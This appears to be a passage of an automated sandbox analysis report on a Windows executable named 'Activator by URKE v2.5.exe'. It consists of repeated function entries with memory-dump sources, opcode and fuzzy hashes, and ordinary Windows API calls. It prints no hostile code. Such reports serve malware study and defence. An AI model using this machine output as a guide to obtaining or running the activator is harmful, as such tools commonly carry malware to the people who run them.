                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ObjectRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1429681911-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                                                                                                  • Instruction ID: 3c1c53acf530bafa6accc731fe88171307e78439143f0b6acaca98e95ba1d7ae
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 617a757d8815b9cd64aff0be7c79d33489404464c5a4c9318e7e7076e56f3154
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65316C7661974587DA04AF22B82876BB7A0FB89FD1F944176ED4A83B14CF3CD9498B00
                                                                                                                                                                                                                                                  Function 00007FF7E5F0C21C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDeviceRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 127614599-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                                                                                                  • Instruction ID: 080d03c33ef39af7051907fd89cedef69d90aefb3d16a259c756554c40d07107
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4f30ad7dfa2e76a7ae327bbc05fad838edf44ef71ac395416f8be742774f962
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1E0C221B0864583EB4867B6F69923AA261AB4CFD0F955036DA0EC3784DD3DC8C54B00
                                                                                                                                                                                                                                                  Function 00007FF7E5EF7644 Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2025052027-0
                                                                                                                                                                                                                                                  • Opcode ID: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
                                                                                                                                                                                                                                                  • Instruction ID: b9680a27e36a597cf06731212594f2e4878dbd51515ea2ca7fe1e25767bbdd13
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9fe3392ab09c49d1196f8df235d0463f4d9b61ecd1758375ad174dc9803bd61
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EB1C422F2864981EA10AF19E654769A361FB44F94FD14133DA8D8B7D1DF7CE4A0C332
                                                                                                                                                                                                                                                  Function 00007FF7E5EFFCDC Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  • Opcode ID: 9fe865261a2bdbfc69447d7f073232b66b0883da029528855bf010fd97c510b6
                                                                                                                                                                                                                                                  • Instruction ID: dbb51d3921d6452a908b728b1b50da414fef5812eb000ed4bc5684aa5bb7daab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fe865261a2bdbfc69447d7f073232b66b0883da029528855bf010fd97c510b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A551D162B14A4A85EB04FB74D5643ECA322EB84F98FC01137DA9C9B796EE38D550C361
                                                                                                                                                                                                                                                  Function 00007FF7E5F0D908 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1077098981-0
                                                                                                                                                                                                                                                  • Opcode ID: d0de3e35c95a6a78d3771101e990bbab72f8e547cf9457486cb1de49695e01d0
                                                                                                                                                                                                                                                  • Instruction ID: 986f0eaa888238beb0012146252bbed77a77cb4625c175f99fdaea1b50751a21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0de3e35c95a6a78d3771101e990bbab72f8e547cf9457486cb1de49695e01d0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD519032A18B4686E710EF21E4547AEB7B4FB84B88F940136EA4ED7A59DF3CD504CB11
                                                                                                                                                                                                                                                  Function 00007FF7E5F2106C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4141327611-0
                                                                                                                                                                                                                                                  • Opcode ID: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                                                                                                  • Instruction ID: 76559f1bfd8d94772c3d428c273c6ac3423f9497c8dbc3c924c81d67428350d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d9a5625d90a928a2b0668c470320c834cfc61c5ffddc2be44e89749fafbb7da
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE41E8A6E0874A46FB25BB12D5607F9E694EF80F90F944132DA4CC7AD5CF3CD4418726
                                                                                                                                                                                                                                                  Function 00007FF7E5F24008 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F24021
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F24083
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F240BD
                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F240E7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1557788787-0
                                                                                                                                                                                                                                                  • Opcode ID: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                                                                                                                                                                                                                                  • Instruction ID: ba337c28511682ac56dcb8163e937c2cf9737f8dee87f272a35835d46e237dd3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6509991160e12f712ad6d4b27e048ebbd13574e2c5e48816f306a01bcccb75f3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD21B475B08759C1EA20EF12A414169F6A4FF44FD0B884136DE8EA7BD4CF7CE4928312
                                                                                                                                                                                                                                                  Function 00007FF7E5F20950 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7E5F1B380,?,?,00000050,00007FF7E5F1D3C1), ref: 00007FF7E5F2095A
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7E5F1B380,?,?,00000050,00007FF7E5F1D3C1), ref: 00007FF7E5F209C2
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7E5F1B380,?,?,00000050,00007FF7E5F1D3C1), ref: 00007FF7E5F209D8
                                                                                                                                                                                                                                                  • abort.LIBCMT ref: 00007FF7E5F209DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1447195878-0
                                                                                                                                                                                                                                                  • Opcode ID: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                                                                                                                                                                                                                                  • Instruction ID: cdeef84a5e56958845b8d6c9c2f1f26408c8baf34d97c48a05a88a8ec4867ab9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31018C9AB0960E42FA59B731A5753FCE19A9F44F80F94053AD96FC27D6ED3CA8404233
                                                                                                                                                                                                                                                  Function 00007FF7E5F0C1CC Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                                                                                                  • Opcode ID: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                                                                                                                                                                                                                                  • Instruction ID: 02578e676332a80f8b8d240ee59a139033914d3d9fa75c0c72f559add3183dd0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8E01B60E0570983EF047BB198353769290AF49F86FD8407BC91EC7750DD3DA9554B11
                                                                                                                                                                                                                                                  Function 00007FF7E5F21704 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                                                                                                  • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                  • Opcode ID: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                                                                                                                                                                                                                                  • Instruction ID: eb506dc02e8abad9d61459fac4b47181f7964c5622496a43f937ce08321e1332
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9515AA6B183C946E7249B3599507EDAB91EB80F90F488232C69CC7BC6CF3CD040C716
                                                                                                                                                                                                                                                  Function 00007FF7E5EF9808 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                                                                                                                                                  • String ID: SIZE
                                                                                                                                                                                                                                                  • API String ID: 449872665-3243624926
                                                                                                                                                                                                                                                  • Opcode ID: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
                                                                                                                                                                                                                                                  • Instruction ID: 64ed8ad613886f317b219f5b23db16d868a07eace1ffbca0d68d0a2ba27d979c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87bb56ca121dbe8459ff7cb6c827e9ac43c466e791526e995e40738a5dfd1e5c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7741F862A1874A42EE10EB14E5603FDA351EF85B90FC04233E6DDC66D6EE3CD540C722
                                                                                                                                                                                                                                                  Function 00007FF7E5F1F7A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                  • API String ID: 3307058713-1199501487
                                                                                                                                                                                                                                                  • Opcode ID: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                                                                                                                                                                                                                                  • Instruction ID: 967083775d326b3586c1ee72a1c80d532971d356293c6a22a31b29cc7ff2b61b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F41A276A08A5A8AE715EF2195602F9F794EF44FD4B844037E90EC7786DE3DE8818321
                                                                                                                                                                                                                                                  Function 00007FF7E5EF9A38 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                                                                                                  • String ID: $%s$@%s
                                                                                                                                                                                                                                                  • API String ID: 2650857296-834177443
                                                                                                                                                                                                                                                  • Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                                                                                                  • Instruction ID: b57f838deffed6b276c5ae7d734f690d976edbcbbb626509f5ba7bf35cd4b4ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F31D472B18A4E85EA10AF15E5607E9A3A1EB44FC4FC01033DE8D9B759DE3CE515C721
                                                                                                                                                                                                                                                  Function 00007FF7E5F000F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
